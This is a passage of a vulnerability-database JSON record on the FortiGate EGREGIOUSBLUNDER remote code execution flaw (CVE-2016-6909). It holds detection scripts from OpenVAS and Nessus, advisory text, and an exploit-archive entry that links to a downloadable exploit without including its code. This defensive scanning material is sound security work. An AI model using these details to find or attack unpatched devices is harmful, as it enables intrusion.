\"4d435b90\",\"4dfab44e\",\"ff4a0272\",\"ff4a0279\",\"4c746382\",\"4d083d66\",\"4d6d6086\",\"4d93cef4\",\n \"4dae1d25\",\"4dd6bce0\",\"4e24a478\",\"4fd0169d\",\"4d840fc3\",\"4e08fe48\",\"48d434a1\",\"499f37d5\",\n \"49db8c53\",\"4a37e619\",\"4b16d14f\",\"4a8de872\",\"4ade35c8\",\"4b318c8f\",\"4b58d602\",\"4ba3ea39\",\n \"ff5a0272\",\"48ebf4e5\",\"49a726b1\",\"49c2f6eb\",\"49d50ba6\",\"4a4972e5\",\"4acf7bf4\",\"4b317cd0\",\n \"4b7c83e9\",\"4cc07c21\",\"499f3876\",\"49db8a8c\",\"4a37e799\",\"4b16ce32\",\"4a8de5dd\",\"4ade354e\",\n \"4b31890b\",\"4b58d766\",\"4ba3e517\",\"4c22a1af\",\"4c2a8997\",\"4c882a6e\",\"4ca38e77\",\"4d434d71\",\n \"4dfaaa8e\",\"ff6b0272\",\"ff6b0279\",\"4c745805\",\"4d0830cf\",\"4d6d4f28\",\"4d93c137\",\"4dae0619\",\n \"4dd6af65\",\"4e2494a1\",\"4d8402ca\",\"4e090c3c\",\"443ed9bc\",\"44c524a6\",\"45217d85\",\"45a3e9c5\",\n \"45baac66\",\"45f0aeca\",\"460d732c\",\"463a98c5\",\"46806671\",\"46cb95bb\",\"47e0676b\",\"48912cc2\",\n \"459484d8\",\"45a6eda3\",\"45ba6ce1\",\"45f1bf6b\",\"460d8176\",\"468abbd8\",\"4683142d\",\"46c618cd\",\n \"46df475e\",\"4717baf9\",\"474b9010\",\"47bcd6f0\",\"48b30c5e\",\"490bb4a5\",\"47a3e919\",\"47df3b36\",\n \"482b67a1\",\"488f9d2b\",\"49063c22\",\"49ae068e\",\"49ff8382\",\"487e6b1d\",\"48d4212c\",\"4927278f\",\n \"49adc356\",\"49c43b4e\",\"49dcde89\",\"4a4ac12f\",\"4acfae3e\",\"4b32925e\",\"4b7bff1f\",\"4cc8529a\",\n \"499f3690\",\"49db8a5a\",\"4a37e3fe\",\"4b16ce96\",\"4a8de623\",\"4ade32d7\",\"4b318927\",\"4b58d762\",\n \"4ba3e573\",\"4c229fca\",\"4c2a82c9\",\"4c882661\",\"4ca391ed\",\"4d434fb7\",\"4dfaabbb\",\"ff800272\",\n \"ff800279\",\"4c74569a\",\"4d082af0\",\"4d6d5188\",\"4d93ba54\",\"4dae0da0\",\"4dd6af1e\",\"4e2496ea\",\n \"4d84181e\",\"4e090fbe\",\"45a6edd5\",\"82ffffff\",\"83ffffff\",\"45217ec9\",\"49064d61\",\"46d96863\",\n \"49d11af3\",\"46cb9c1e\",\"4acff334\" );\n\nif( in_array( search:et, array:etags ) )\n{\n report = 'The Etag \"' + et + '\" of the remote Forti device was found in the 
\"EGBL.config\" and therefore the device is affected by a security bypass.';\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 0 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-11T15:03:24", "edition": 2, "description": "Exploit for hardware platform in category web applications", "published": "2016-08-19T00:00:00", "type": "zdt", "title": "Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6909"], "modified": "2016-08-19T00:00:00", "id": "1337DAY-ID-25265", "href": "https://0day.today/exploit/description/25265", "sourceData": "# Exploit Title: Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)\r\n# Date: 19-08-2016\r\n# Exploit Author: Shadow Brokers\r\n# Vendor Homepage: https://www.fortinet.com/products/fortigate/\r\n \r\n \r\nFull Exploit:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40276.zip\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25265"}], "nessus": [{"lastseen": "2021-02-01T02:44:40", "description": "The remote FortiGate device is running a version of FortiOS that is\n4.1.x prior to 4.1.11, 4.2.x prior to 4.2.13, or 4.3.x prior to 4.3.9. \nIt is, therefore, affected by a remote code execution vulnerability,\nknown as EGREGIOUSBLUNDER, in the web interface due to improper\nvalidation when parsing cookies. An unauthenticated, remote attacker\ncan exploit this, via a specially crafted HTTP request, to cause a\nbuffer overflow condition, resulting in a denial of service condition\nor the execution of arbitrary code. 
\n\n\nEGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2016/08/14 by a group known as the Shadow\nBrokers.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-26T00:00:00", "title": "Fortinet FortiOS 4.1.x < 4.1.11 / 4.2.x < 4.2.13 / 4.3.x < 4.3.9 Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6909"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTIOS_FG-IR-16-023.NASL", "href": "https://www.tenable.com/plugins/nessus/93128", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93128);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2016-6909\");\n script_bugtraq_id(92523);\n script_xref(name:\"EDB-ID\", value:\"40276\");\n\n script_name(english:\"Fortinet FortiOS 4.1.x < 4.1.11 / 4.2.x < 4.2.13 / 4.3.x < 4.3.9 Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)\");\n script_summary(english:\"Checks version of FortiOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FortiGate device is running a version of FortiOS that is\n4.1.x prior to 4.1.11, 4.2.x prior to 4.2.13, or 4.3.x prior to 4.3.9. \nIt is, therefore, affected by a remote code execution vulnerability,\nknown as EGREGIOUSBLUNDER, in the web interface due to improper\nvalidation when parsing cookies. An unauthenticated, remote attacker\ncan exploit this, via a specially crafted HTTP request, to cause a\nbuffer overflow condition, resulting in a denial of service condition\nor the execution of arbitrary code. 
\n\n\nEGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2016/08/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://fortiguard.com/psirt/FG-IR-16-023\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortinet FortiOS 4.1.11 / 4.2.13 / 4.3.9 / 5.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\",value:\"2016/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2016/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"fortinet_version.nbin\");\n script_require_keys(\"Host/Fortigate/model\", \"Host/Fortigate/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"FortiOS\";\n\nversion = 
get_kb_item_or_exit(\"Host/Fortigate/version\");\nmodel = get_kb_item_or_exit(\"Host/Fortigate/model\");\n\n# Make sure device is FortiGate\nif (!preg(string:model, pattern:\"fortigate\", icase:TRUE)) audit(AUDIT_HOST_NOT, \"a FortiGate\");\n\nif (version =~ \"^4\\.1\\.\") fix = \"4.1.11\";\nelse if (version =~ \"^4\\.2\\.\") fix = \"4.2.13\";\nelse if (version =~ \"^4\\.3\\.\") fix = \"4.3.9\";\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n report =\n '\\n Model : ' + model +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, extra:report, port:0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}